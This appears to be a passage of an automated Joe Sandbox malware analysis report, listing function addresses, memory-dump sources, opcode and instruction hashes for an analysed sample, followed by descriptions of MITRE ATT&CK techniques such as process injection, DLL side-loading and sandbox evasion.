Opcode Fuzzy Hash: d55fff9d661807f0c5ebb8a5468a810ce2d60ec85a2c841abd60d6a27683b5ff
Instruction Fuzzy Hash: C9116D31F1C40A8FEA9AEA28D4A56B833D1EF5A311F1401F5D94FC3296DD2CE9859A00

Function 00007FFD3494F78D Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4767b036097a5b32506586f5264456ce248eb8cddbc56bbc4a21a06dba74e73
Instruction ID: a2a1393f8d99561a74980b50865e346568e651fc84353a0293a8f2a1c6807e99
Opcode Fuzzy Hash: f4767b036097a5b32506586f5264456ce248eb8cddbc56bbc4a21a06dba74e73
Instruction Fuzzy Hash: D60122277085421BCB15E72CDCFA5E93790EF8722030840BAD548CF193EA19E40A8251

Function 00007FFD34943190 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e6a8176eca1789f041dc24bd1328d92865564bad627bebf59d3f7ec0f3133d
Instruction ID: b35215e5ab618da86fe2d9c4a99f496a62af26ba7e48194c7a67a7517cb610d8
Opcode Fuzzy Hash: 61e6a8176eca1789f041dc24bd1328d92865564bad627bebf59d3f7ec0f3133d
Instruction Fuzzy Hash: 6C115320B08A498FCB64DF79D4A09FA7BA1FF19200B80067FD54EC34E2DE28B4199380

Function 00007FFD34555A47 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9381d7721da28d485703042d540749991a49f9d5cd7cab07731267fb97ab122a
Instruction ID: 8f878b2543ef2b960bc83960d6120122d566b1381a8a941e3db41af1c018fc80
Opcode Fuzzy Hash: 9381d7721da28d485703042d540749991a49f9d5cd7cab07731267fb97ab122a
Instruction Fuzzy Hash: 6211C131F2C90A8BE796AB18D8A52BC7391FF4A710F5401F9D90FC3296EE3CA9409641

Function 00007FFD3494F5FF Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84debe99de570423cb863b8094e58a17b92d88fef52d300d30b2cc622d8a993e
Instruction ID: a1ef46f58985ca2af470a0f87a88c358510e2f07bfd1d2aa4c95479b140de6c0
Opcode Fuzzy Hash: 84debe99de570423cb863b8094e58a17b92d88fef52d300d30b2cc622d8a993e
Instruction Fuzzy Hash: E011E136B0C6555FDB69E62CD8B60E67BD0EF5632470840BEC1CCCF5A3E908E44A8250

Function 00007FFD345507D0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db24ccaa30d3aa84f9f76e8fc495b55cd6453a6fe0dbddc6d4a58098b17456c6
Instruction ID: bb05965630e6a4469a24ae5aeb40b4e9a5cb5b3b35eefb1e6a9a59cfa54c86df
Opcode Fuzzy Hash: db24ccaa30d3aa84f9f76e8fc495b55cd6453a6fe0dbddc6d4a58098b17456c6
Instruction Fuzzy Hash: C411A022F0C95A0BE795E76888B53B9B5C2EF8A350F4402F6E64ED32C2DD2CEC504781

Function 00007FFD3494300E Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42e91e6e3116d72909c54c3b8a37d0e79ab6c0cd690d704a073aa6522c1423d
Instruction ID: 93a931a6d91cfbb2646209757a1e57b61361e352c6ef4ba937a9967f459df2b0
Opcode Fuzzy Hash: c42e91e6e3116d72909c54c3b8a37d0e79ab6c0cd690d704a073aa6522c1423d
Instruction Fuzzy Hash: 9011483130850A8FDB15CF68D4A8AE67B91EF59351F54027FDA0AC32A1DB6AA521C780

Function 00007FFD345510BD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8116354921ec5fa49f172d53f149e752878f2b8e204883b8cf6d27201d04d4dd
Instruction ID: 6b0ddbebcf4b82f2f3792185edc2ba7013befa4ee97c5fbe25c453d66dc74fec
Opcode Fuzzy Hash: 8116354921ec5fa49f172d53f149e752878f2b8e204883b8cf6d27201d04d4dd
Instruction Fuzzy Hash: 5A012615E8D6D10FE72A57B48CB15B27FE4DF8332070901FAD186CB1A3C84DA886C761

Function 00007FFD34550C38 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 577a02679254f602d5fcb618ab1a155018b6df2a996facb0cb879eabbca781f6
Instruction ID: dbb4c38abe41b7420d6f0fe1a0fb0fffb5342999ac141f2eb342cf7cd0eff6ad
Opcode Fuzzy Hash: 577a02679254f602d5fcb618ab1a155018b6df2a996facb0cb879eabbca781f6
Instruction Fuzzy Hash: DB11E036F0D2898FE712DB6888A11ACBBB0EF43320F0440F7C246DB192D93C95469781

Function 00007FFD34550C40 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d66b0d27130fc2cbed88a0cec58bca87c72ea035a3ce63602f0bb244dbe925df
Instruction ID: 82b1235034b95a985faae7acb5f1fbfaa4af1b1479d47033b67f4f10c3cea5a3
Opcode Fuzzy Hash: d66b0d27130fc2cbed88a0cec58bca87c72ea035a3ce63602f0bb244dbe925df
Instruction Fuzzy Hash: C011A136E0D2899FE712DB68C8A11ADBFB0EF43320F1541F7C546DB192D93C95459781

Function 00007FFD3494F5D1 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e774e8efa546801323f8c0c488f1937fdfefe159809f87ce14988df747e64d43
Instruction ID: 43427a8ceb673c35db36edaf836af98e0462f332984ba4f1be91ac9e4d2a7f71
Opcode Fuzzy Hash: e774e8efa546801323f8c0c488f1937fdfefe159809f87ce14988df747e64d43
Instruction Fuzzy Hash: 48F04436609A141FCB69F62CC8A64E17BD0DF0632030480BEC08DCB5B3E909E00AC380

Function 00007FFD3455586B Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24cb64031c059ec9270d6c4158c4c20288c40a4f3d01017c3f2378f1e80988cb
Instruction ID: 8870be33fbd60bd6a35a9fe0dd3b5584d1fa42a2221c371a05cf26a0d96fe5d6
Opcode Fuzzy Hash: 24cb64031c059ec9270d6c4158c4c20288c40a4f3d01017c3f2378f1e80988cb
Instruction Fuzzy Hash: 8F110030E08A188FDB99DF08C894BA973B0EB69311F1445EAD54EE3294CA75AD84CF81

Function 00007FFD34550C48 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd79b01b83ece35540fa6d400fdb1f5d42bb6322fb6dd1faf5dff2ae0730293
Instruction ID: 64df9438b259f0bd63d795869a00641e788000dac1871c4b96b5f49990a55194
Opcode Fuzzy Hash: 4cd79b01b83ece35540fa6d400fdb1f5d42bb6322fb6dd1faf5dff2ae0730293
Instruction Fuzzy Hash: 5B018C36E0D2899FEB12DB68C8A11ADBFB0EF43310F1541F7C546DB192D938AA459781

Function 00007FFD3494F7FF Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858dde6db02c22e20cc04f4296438091e54752f590d2415bd35990dc76d741cc
Instruction ID: 65876862f06f801d7ace23e3246a67a169578c292214770c25f5be0cf24f469a
Opcode Fuzzy Hash: 858dde6db02c22e20cc04f4296438091e54752f590d2415bd35990dc76d741cc
Instruction Fuzzy Hash: 71F0E9367086421FCB59E62CDCAA4E837D0DF5733570800BAD109CF257FD1A98498351

Function 00007FFD34555A94 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87367cf5a9ec04028e753dccc507467d57cad249768860922cb061b81dfaa3c6
Instruction ID: e3ae1a1251519ef4b673c81b2bf54d6a79a0f915f664fbb8e234af0078b263cb
Opcode Fuzzy Hash: 87367cf5a9ec04028e753dccc507467d57cad249768860922cb061b81dfaa3c6
Instruction Fuzzy Hash: 06F08130E1841F8BEB9AAA14D8A52F87361FB15311F0001F9C54FD3196DE3CA9859A40

Function 00007FFD34550C50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48e67629967be5a3a08d57ea694eda9111e2f39a1c57f2765e745afe3ebe9f19
Instruction ID: f313a2be87f8d2e2c165d583db379a89f1409a726f64b64897505b9ea4fb8c30
Opcode Fuzzy Hash: 48e67629967be5a3a08d57ea694eda9111e2f39a1c57f2765e745afe3ebe9f19
Instruction Fuzzy Hash: 77017C36E0D3899FEB12DB6888A51ADBFB0EF03310F1441F6C546DB192D93C9A459741

Function 00007FFD349417F2 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec4a06b2153754ae568cee4328e85f12bbbfe61872f3bf9cccbf98699977957
Instruction ID: 1025b8a1e3646038f3753d1e6bd3d670d649d04f63ca9afb0c754c2cc0d53ad9
Opcode Fuzzy Hash: 0ec4a06b2153754ae568cee4328e85f12bbbfe61872f3bf9cccbf98699977957
Instruction Fuzzy Hash: E5F0963184D2C99FD712DB70C8A65D97FE4AF43224B1900FAD545C72A2CA6D150AD762

Function 00007FFD349503D9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d3af968ab8b25e1eff20392ed0288be2a20fa0d7e2222313a7ac6a299e2958
Instruction ID: 425f18b35368e3691f4c1d124394d2681f96598985bf9562e44b72afed812d32
Opcode Fuzzy Hash: e7d3af968ab8b25e1eff20392ed0288be2a20fa0d7e2222313a7ac6a299e2958
Instruction Fuzzy Hash: E8F0A72170CB880FC72A562D48A9065BFE1DB6B11134A43EFC045C75F3DD59AC898341

Function 00007FFD3494EB99 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3460044e6f8bb7eb0d0de6f41446a0c7e54337445beb7ede183fe61e717cd937
Instruction ID: 81f9f35c9815fcfa75bda9f2388caafb1f9fcecba8e813ee7d5522307b842ce5
Opcode Fuzzy Hash: 3460044e6f8bb7eb0d0de6f41446a0c7e54337445beb7ede183fe61e717cd937
Instruction Fuzzy Hash: 70F0EC3170DF880FD719962D486C0617FF1DB6611234A03EFC145C76B3DD59AC888341

Function 00007FFD349424EA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c21e4bfb8c86532bc573e506b772d679dcc5d0f57733a0c11f2e723000ec4f1
Instruction ID: 1faf657c700739191097118df392f438c159ac4a09128072d6ff9fe2f7631e3b
Opcode Fuzzy Hash: 0c21e4bfb8c86532bc573e506b772d679dcc5d0f57733a0c11f2e723000ec4f1
Instruction Fuzzy Hash: 1FF06D21A0C2854FDB239A7088B14A83BA0EF6734031906FAC585CF2D7D5A86406A721

Function 00007FFD3494AE68 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e2ec67f518fb9c5b50b8ec591e180b5ed7f6489855182baf4426f6b70e4d42
Instruction ID: b5aaba8d46eab127afec9253bb331b5f7a7f466eed6f1b39c0896396f26f0e45
Opcode Fuzzy Hash: 36e2ec67f518fb9c5b50b8ec591e180b5ed7f6489855182baf4426f6b70e4d42
Instruction Fuzzy Hash: 97E0C230704E0C4B5B2CA52EA49C471B3D1C7B9212344437FA40BC37A4DC55FC844284

Function 00007FFD345510F0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19686eaf55b7cf08a4b3481fd30ff546b68be5f06baff0b2dffbb40eb055fb4f
Instruction ID: c3990e0e6f3a0d9d196f3fa7d910f12808aedc6b2a4b4ba62e5f14afb71c7a4f
Opcode Fuzzy Hash: 19686eaf55b7cf08a4b3481fd30ff546b68be5f06baff0b2dffbb40eb055fb4f
Instruction Fuzzy Hash: 35E02625F4CC0907EB7CB6B468B11B07280DB46311B0501BAD10AC2282CC4DAC814280

Function 00007FFD34553B1F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a6f6a1c85e16d92eda54594b5d82e52f021eb65ac43facd308aa87e06ee91a8
Instruction ID: 0773b7f971177c7efd511a21eecf4feea5201731fd020b68102b11a069dc5bb3
Opcode Fuzzy Hash: 6a6f6a1c85e16d92eda54594b5d82e52f021eb65ac43facd308aa87e06ee91a8
Instruction Fuzzy Hash: 49F03030E0914647FB555654C4A17FA2360EB46320F2442F9EF1FD33D5CD2CAD45AB55

Function 00007FFD34550B95 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c0ddbf3720e39f6b38fe7feb90305bca6f60561a0b7ddaa9c59d0b1193ae5b4
Instruction ID: 475a6c7111a730193827fec58a350f3fa15acb5b2312cafdb30b7826ac232946
Opcode Fuzzy Hash: 7c0ddbf3720e39f6b38fe7feb90305bca6f60561a0b7ddaa9c59d0b1193ae5b4
Instruction Fuzzy Hash: B2D0A73062854E4FDA01F73CC88A4647BA0EB1B214BD510F1D009C7561C50998958B00

Function 00007FFD345544FF Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d85b97d238c1e3acd9feee14df4a379a18e36dac4276d5448c6dcfac623186
Instruction ID: 350ef4b2970d0f97e8df0ddd369f65bda0732a4405fca867a0dfb4e5be801c26
Opcode Fuzzy Hash: b2d85b97d238c1e3acd9feee14df4a379a18e36dac4276d5448c6dcfac623186
Instruction Fuzzy Hash: 52D05E01F1C81746E379A298586117E08865B8272AF140174E20FDA5C7DD4D6A1222D6

Function 00007FFD345506A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4a71e5b2110fd454efaf29df05a1d51e4324152f29b3885dc9d4fe0b37887c3
Instruction ID: ffc19224fdb0d40721249c0282f45bb07167a937622b510b656757fd04341601
Opcode Fuzzy Hash: a4a71e5b2110fd454efaf29df05a1d51e4324152f29b3885dc9d4fe0b37887c3
Instruction Fuzzy Hash: 62C04C06F5B51B01F517716E54E60BDA1506FD7A60FD501F2D70EE00C59C4DA0D56156

Function 00007FFD345512D8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
Instruction ID: 6f1240cc3ffbe3a89fa5d9a3dfda122ea462e7f8f0480fddd1c651f1f5bccb48
Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
Instruction Fuzzy Hash: 41C04C349518098FC949EB29C8D591877E0FB1A215BD500D0E409D7171E659DCD5D781

Function 00007FFD34942FEB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a682c8b9050131fff2ccf6c070bfae2a544275b64395979550a3f84727abf9
Instruction ID: 68c4953110a382f9e52d23b647c33fa487577f4221588571226ea19b3e65f76c
Opcode Fuzzy Hash: 70a682c8b9050131fff2ccf6c070bfae2a544275b64395979550a3f84727abf9
Instruction Fuzzy Hash: 11D09210B0C54395F679C621C1B023A6AA15F0A304FE4407ED3AFD1AC9CD1DB8417631

Function 00007FFD345506C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c91385e51ffae7aacf19c1359f094a5c132148be1a8cd28b3fb5c26677793f9
Instruction ID: c081b1e6a2effc1a84e6b281abfc46cb1493a28c3fb026efe38a9ae3a7640be7
Opcode Fuzzy Hash: 6c91385e51ffae7aacf19c1359f094a5c132148be1a8cd28b3fb5c26677793f9
Instruction Fuzzy Hash: CAB01200D5740F00A505317A08D60B470505F46100FC100F0E60ED0085984D50942243

Non-executed Functions

Function 00007FFD345509B0 Relevance: 5.2, Strings: 4, Instructions: 184COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD34550B3E
!k9, xrefs: 00007FFD34550B4E
"s9, xrefs: 00007FFD34550B46
c9, xrefs: 00007FFD34550B56

Memory Dump Source

Source File: 0000000B.00000002.4571516537.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34550000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 8f971304915fc3b10e906b7c42e9a5ff4cd6d7af5f5e4ab9cdac959dfc18e754
Instruction ID: 1a109456e0044ff94e1d7d41e8a526a8852384028cc2a4e0c3c3f96bf8dee443
Opcode Fuzzy Hash: 8f971304915fc3b10e906b7c42e9a5ff4cd6d7af5f5e4ab9cdac959dfc18e754
Instruction Fuzzy Hash: 93416207F1C56267E92A37FD74611FE5B889FA1379B084677E24DD90E34C08E88682E5

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

